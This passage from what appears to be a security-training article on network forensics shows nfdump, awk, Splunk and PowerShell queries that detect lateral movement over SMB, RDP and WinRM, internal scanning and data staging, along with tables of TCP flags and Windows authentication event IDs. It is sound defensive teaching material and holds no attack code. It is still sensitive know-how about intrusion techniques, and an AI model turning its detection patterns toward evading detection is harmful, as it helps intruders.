plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %dp %byt %flg\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 445 and src net 10.10.0.0/24 and dst net 10.10.0.0/24\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">grep</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-v</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"10.10.0.10\"</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Exclude file server if one exists in that subnet</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 4: Detect RDP lateral movement ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %te %sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 3389 and src net 10.10.0.0/16 and dst net 10.10.0.0/16\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{ bytes=$5; src=$3; dst=$4</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">           if (bytes &gt; 0) print src \" -&gt; \" dst \" bytes=\" bytes }'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">uniq</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-c</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 5: WinRM lateral movement (port 5985) ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># PowerShell remoting  rarely legitimate between workstations</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"dst port 5985 and src net 10.10.0.0/16\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># ─── SCENARIO 6: Data staging  large internal transfers ───</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Before exfiltration, attackers stage data on a single host</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Look for unusually large transfers TO a single internal host</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%sa %da %byt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src net 10.10.0.0/16 and dst net 10.10.0.0/16\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{bytes[$2] += $3} END {for (dst in bytes) print bytes[dst], dst}'</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">sort</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-rn</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">head</span><span class=\"token plain\"> </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-20</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'{gb=$1/1073741824; printf \"%-15s received %.2f GB\\n\", $2, gb}'</span><br></span></code></pre></div></div>\n<p><strong>Splunk SPL equivalent for organizations storing NetFlow in Splunk:</strong></p>\n<div class=\"language-spl codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-spl codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| tstats count, sum(bytes) as total_bytes, dc(dest_ip) as unique_dests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    WHERE index=netflow earliest=-24h</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    BY src_ip, dest_port</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where dest_port IN (445, 135, 3389, 5985, 5986, 22)    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND src_ip LIKE \"10.10.%\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval is_internal_src = if(match(src_ip, \"^10\\.10\\.\"), 1, 0)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where is_internal_src=1</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where unique_dests &gt; 5    /* scanning: one source hitting many destinations */</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval total_GB = round(total_bytes/1073741824, 3)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort -unique_dests</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table src_ip, dest_port, unique_dests, count, total_GB</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"44-reading-tcp-flags-for-attack-technique-fingerprinting\">4.4 Reading TCP Flags for Attack Technique Fingerprinting<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#44-reading-tcp-flags-for-attack-technique-fingerprinting\" class=\"hash-link\" aria-label=\"Direct link to 4.4 Reading TCP Flags for Attack Technique Fingerprinting\" title=\"Direct link to 4.4 Reading TCP Flags for Attack Technique Fingerprinting\" translate=\"no\">​</a></h3>\n<p>TCP flags in NetFlow records reveal the nature of a connection without needing packet content. This is particularly useful for distinguishing scanning from actual sessions:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">TCP Flags in NetFlow (hex byte):</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Flag    Hex    Meaning in NetFlow                Attacker Significance</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN     0x02   Connection attempt                Scanning: many SYN with no SYN-ACK response</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN-ACK 0x12   Connection accepted               Normal connection establishment</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">RST     0x04   Connection refused/reset          Port closed  target not listening</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">FIN-ACK 0x11   Clean session termination         Full session completed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SYN-RST 0x06   SYN followed immediately by RST  Stealth scan (half-open)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">PSH-ACK 0x18   Data transfer in progress         Active session with data movement</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">─────────────────────────────────────────────────────────────────</span><br></span></code></pre></div></div>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Find SYN-only flows (scanning  connections never completed)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># High ratio of SYN-only to SYN-ACK on internal scanning traffic</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">nfdump </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-R</span><span class=\"token plain\"> /var/cache/nfdump/2025/11/15/ </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-o</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"fmt:%ts %sa %da %dp %flg %pkt\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"src net 10.10.0.0/16 and dst port 445\"</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">|</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">\\</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">awk</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        /\\.S\\.\\.\\.\\./ { syn_only[$3]++ }     # SYN flag only = unresponded</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        /\\.SA\\.\\.\\.\\./ { syn_ack[$3]++ }     # SYN-ACK = completed handshake</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        END {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">            for (dst in syn_only) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                ratio = (syn_ack[dst] &gt; 0) ? syn_only[dst]/syn_ack[dst] : 999</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                if (ratio &gt; 10) {  # 10x more SYN than SYN-ACK = scanning</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                    printf \"SCAN detected toward %s: %d SYN, %d SYN-ACK, ratio=%.1f\\n\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                           dst, syn_only[dst], syn_ack[dst], ratio</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">                }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">    '</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--windows-authentication-log-correlation\">Part 5  Windows Authentication Log Correlation<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#part-5--windows-authentication-log-correlation\" class=\"hash-link\" aria-label=\"Direct link to Part 5  Windows Authentication Log Correlation\" title=\"Direct link to Part 5  Windows Authentication Log Correlation\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"51-the-authentication-events-that-matter-for-network-forensics\">5.1 The Authentication Events That Matter for Network Forensics<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#51-the-authentication-events-that-matter-for-network-forensics\" class=\"hash-link\" aria-label=\"Direct link to 5.1 The Authentication Events That Matter for Network Forensics\" title=\"Direct link to 5.1 The Authentication Events That Matter for Network Forensics\" translate=\"no\">​</a></h3>\n<p>Windows Security event logs on Domain Controllers capture every network authentication attempt in the domain. These events are the <strong>identity layer</strong>  they tell you which account was used for which network connection, from which source machine.</p>\n<!-- -->\n<p><strong>The key event IDs for network forensics correlation:</strong></p>\n<table><thead><tr><th>Event ID</th><th>Log Location</th><th>What It Records</th><th>Lateral Movement Significance</th></tr></thead><tbody><tr><td><strong>4624</strong></td><td>Security (target host)</td><td>Successful logon</td><td>Type 3 = network logon; maps network connection to identity</td></tr><tr><td><strong>4625</strong></td><td>Security (target host)</td><td>Failed logon</td><td>Brute force, pass-the-hash failures, scanning</td></tr><tr><td><strong>4648</strong></td><td>Security (source host)</td><td>Explicit credentials used</td><td>Attacker using alternate credentials from a host</td></tr><tr><td><strong>4672</strong></td><td>Security (target host)</td><td>Special privileges assigned</td><td>Admin-equivalent access on target</td></tr><tr><td><strong>4769</strong></td><td>Security (DC)</td><td>Kerberos TGS request</td><td>Which service ticket was requested from which host</td></tr><tr><td><strong>4776</strong></td><td>Security (DC)</td><td>NTLM credential validation</td><td>NTLM auth  includes source workstation and account</td></tr><tr><td><strong>4768</strong></td><td>Security (DC)</td><td>Kerberos TGT request</td><td>Initial Kerberos auth  includes source IP</td></tr><tr><td><strong>4771</strong></td><td>Security (DC)</td><td>Kerberos pre-auth failure</td><td>Failed Kerberos  password spray, enumeration</td></tr></tbody></table>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-extracting-authentication-based-movement-chains\">5.2 Extracting Authentication-Based Movement Chains<a href=\"https://inferencedefense.com/academy/blog-internal/network-forensics-lateral-movement-dns-netflow-auth-logs#52-extracting-authentication-based-movement-chains\" class=\"hash-link\" aria-label=\"Direct link to 5.2 Extracting Authentication-Based Movement Chains\" title=\"Direct link to 5.2 Extracting Authentication-Based Movement Chains\" translate=\"no\">​</a></h3>\n<p>The most powerful query in Windows auth log forensics: find every machine that <code>jsmith@corp.local</code> authenticated to, in chronological order. This is the lateral movement chain.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Build authentication chain for a specific account across all DCs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Run against your SIEM or directly against DC Security logs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$targetAccount = \"jsmith\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$startTime = [DateTime]::Parse(\"2025-11-15 00:00:00\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$endTime   = [DateTime]::Parse(\"2025-11-16 00:00:00\")</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Query all DCs for logon events involving the account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$domainControllers = (Get-ADDomainController -Filter *).Name</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$authEvents = @()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($dc in $domainControllers) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Host \"Querying $dc...\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Event 4624 (logon) and 4648 (explicit creds) and 4769 (Kerberos TGS)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $filter = @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        LogName   = 'Security'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Id        = @(4624, 4648, 4769, 4776)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        StartTime = $startTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        EndTime   = $endTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    try {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $events = Get-WinEvent -ComputerName $dc -FilterHashtable $filter `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                               -ErrorAction Stop</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        foreach ($event in $events) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $xml = [xml]$event.ToXml()</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $data = $xml.Event.EventData.Data</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            # Extract relevant fields based on event ID</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            $entry = [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Timestamp   = $event.TimeCreated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                EventID     = $event.Id</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                DC          = $dc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AccountName = ($data | Where-Object Name -eq 'TargetUserName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AccountDomain = ($data | Where-Object Name -eq 'TargetDomainName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                SourceIP    = ($data | Where-Object Name -eq 'IpAddress').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                Workstation = ($data | Where-Object Name -eq 'WorkstationName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                LogonType   = ($data | Where-Object Name -eq 'LogonType').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                AuthPackage = ($data | Where-Object Name -eq 'AuthenticationPackageName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                ServiceName = ($data | Where-Object Name -eq 'ServiceName').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                LogonID     = ($data | Where-Object Name -eq 'TargetLogonId').'#text'</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            # Filter for our target account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            if ($entry.AccountName -like \"*$targetAccount*\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                $authEvents += $entry</span><br></span><span class=\"token-line\" 